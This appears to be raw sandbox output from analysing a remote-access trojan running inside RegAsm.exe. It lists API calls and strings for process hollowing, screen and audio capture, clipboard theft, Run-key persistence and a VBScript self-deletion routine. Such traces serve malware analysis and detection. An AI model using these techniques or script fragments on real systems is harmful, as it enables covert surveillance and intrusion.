                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                  Similarity
                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                  • String ID:
                                                  • API String ID: 2829624132-0
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                  • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                  • CloseClipboard.USER32 ref: 0040B760
                                                  Similarity
                                                  • API ID: Clipboard$CloseDataOpen
                                                  • String ID:
                                                  • API String ID: 2058664381-0
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID: JD
                                                  • API String ID: 1084509184-2669065882
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: GetLocaleInfoEx
                                                  • API String ID: 2299586839-2904428671
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                  Similarity
                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                  • String ID:
                                                  • API String ID: 1663032902-0
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                  • String ID:
                                                  • API String ID: 2692324296-0
                                                  APIs
                                                    • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                  • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  APIs
                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                  • String ID:
                                                  • API String ID: 1084509184-0
                                                  APIs
                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                    • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                  • DeleteDC.GDI32(00000000), ref: 00418F65
                                                  • DeleteDC.GDI32(00000000), ref: 00418F68
                                                  • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                  • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                  • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                  • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                  • DeleteObject.GDI32(?), ref: 00419027
                                                  • DeleteObject.GDI32(?), ref: 00419034
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                  • DeleteDC.GDI32(?), ref: 004191B7
                                                  • DeleteDC.GDI32(00000000), ref: 004191BA
                                                  • DeleteObject.GDI32(00000000), ref: 004191BD
                                                  • GlobalFree.KERNEL32(?), ref: 004191C8
                                                  • DeleteObject.GDI32(00000000), ref: 0041927C
                                                  • GlobalFree.KERNEL32(?), ref: 00419283
                                                  • DeleteDC.GDI32(?), ref: 00419293
                                                  • DeleteDC.GDI32(00000000), ref: 0041929E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 479521175-865373369
                                                  • Opcode ID: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                  • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                  • Opcode Fuzzy Hash: 7c8983c53be72e5ee4313047db9d93c3c673d7ce03baff72bd223da92b172140
                                                  • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                  • API String ID: 4188446516-3035715614
                                                  • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                  • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                  • ExitProcess.KERNEL32 ref: 0040D80B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-1447701601
                                                  • Opcode ID: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                  • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                  • Opcode Fuzzy Hash: 5d2ec2f2100dd23cc365e5a044f7fac0ce6a70abfbf1c55e622674ec0d54512f
                                                  • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                    • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                    • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6C7C8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                  • ExitProcess.KERNEL32 ref: 0040D454
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                  • API String ID: 3797177996-2483056239
                                                  • Opcode ID: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                  • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                  • Opcode Fuzzy Hash: 2ee98ea0d0f3863be26643997f5fff8c6a28cb97601397e967d1afa7fe61d675
                                                  • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                  • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                  • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                  • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                  • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                    • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                  • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                  • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                  • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                  • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                  • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                  • API String ID: 2649220323-436679193
                                                  • Opcode ID: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                  • Opcode Fuzzy Hash: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                  • API String ID: 738084811-2094122233
                                                  • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                  • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-255920310
                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                  • _wcslen.LIBCMT ref: 0040D001
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                  Memory Dump Source
